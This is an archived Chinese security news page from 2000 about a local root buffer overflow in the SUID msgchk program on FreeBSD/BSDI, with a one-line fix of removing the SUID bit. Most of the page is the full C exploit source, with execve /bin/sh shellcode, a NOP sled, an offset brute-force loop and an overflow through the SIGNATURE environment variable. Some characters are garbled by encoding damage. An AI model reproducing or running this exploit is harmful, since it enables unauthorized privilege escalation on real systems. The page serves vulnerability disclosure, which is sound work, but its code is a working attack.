FreeBSD/BSDI本地溢出

（2000-05-26 00:00 ）（安络）（不详）

导读-- BSD的msgchk程序存在溢出允许本地用户获取root......

婕俺绦颍?
/usr/contrib/mh/bin/msgchk

描述
BSD的msgchk程序存在溢出允许本地用户获取root

详细
这个测试代码是由Linux下发展过来的，测试结果显示在BSD上也通过
仅供安全研究，请勿滥用或者随意散播!

/* private */
/*
* mh/msgchk, mh/inc _demonstration_ LOCAL exploit for FreeBSD/BSDi
* ( ported from linux ) 4-Apr-1998 by stran9er
*
* Based:
* on some bsd_lpr_exploit.c by unknown author..
* and info from bugtraq
*
* Disclaimer:
* this program is for (demo) educational purposes only.
*/

#include $#@60;stdio.h$#@62;
#include $#@60;stdlib.h$#@62;
#include $#@60;unistd.h$#@62;

#define DEFAULT_OFFSET 1000
/* 700..1500 step 100 */
/* -3700..-2700 step 100 */
/* -1000 for bsdi4
*
#!/bin/csh
set v = -5000
while ($v $#@60; 5000)
echo try $v
./mh684bsd $v
@ v+=100
end
*
*/

#define BUFFER_SIZE 4000
#define BUFFER_NOP 999

long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}

main(int argc, char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int offset = DEFAULT_OFFSET;

char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

int i;
if (argc$#@62;1) offset = atoi(argv[1]);
fprintf (stderr,"\nUsing offset %d (esp==%x)\n",offset,get_esp());
buff = malloc(BUFFER_SIZE);
if(!buff) {printf("cant allocate memory\n");exit(0);}

ptr = buff;

memset(ptr, 0x90, BUFFER_SIZE);

ptr += BUFFER_NOP-strlen(execshell);
for(i=0;i $#@60; strlen(execshell);i++)
*(ptr++) = execshe i];

addr_ptr = (long *)ptr;
for(i=0;i$#@60;(BUFFER_SIZE-BUFFER_NOP)/4;i++)
*(addr_ptr++) = get_esp() + offset;

ptr = (char *)addr_ptr;
*ptr = 0;
strncpy (buff,":)From:md@lspvs.sorosis.ro ",28); /* i said - ported from linux.. */

fprintf (stderr,"\nesp+offset==%x\n",get_esp()+offset);
setenv("SIGNATURE",buff,1);
execl ("/usr/contrib/mh/bin/msgchk", "msgchk", NULL);
// execl ("/usr/contrib/mh/bin/inc", "inc", NULL);
fprintf (stderr,"execl error...");
}
/* By cami, darknet */
/* private */

解决方案
去掉/usr/contrib/mh/bin/msgchk的SUID位

责编：

（订阅新闻邮件）（推荐）（打印）（关闭页面）（至顶）（我对此感兴趣）

天极社区邀请您：写博客日记上传相片论坛聊天订阅电子杂志彩信蚂蚁推荐网摘

请您注意：

　遵守国家有关法律、法规，尊重网上道德，承担一切因您的行为而直接或间接引起的法律责任。

　天极网拥有管理笔名和留言的一切权利。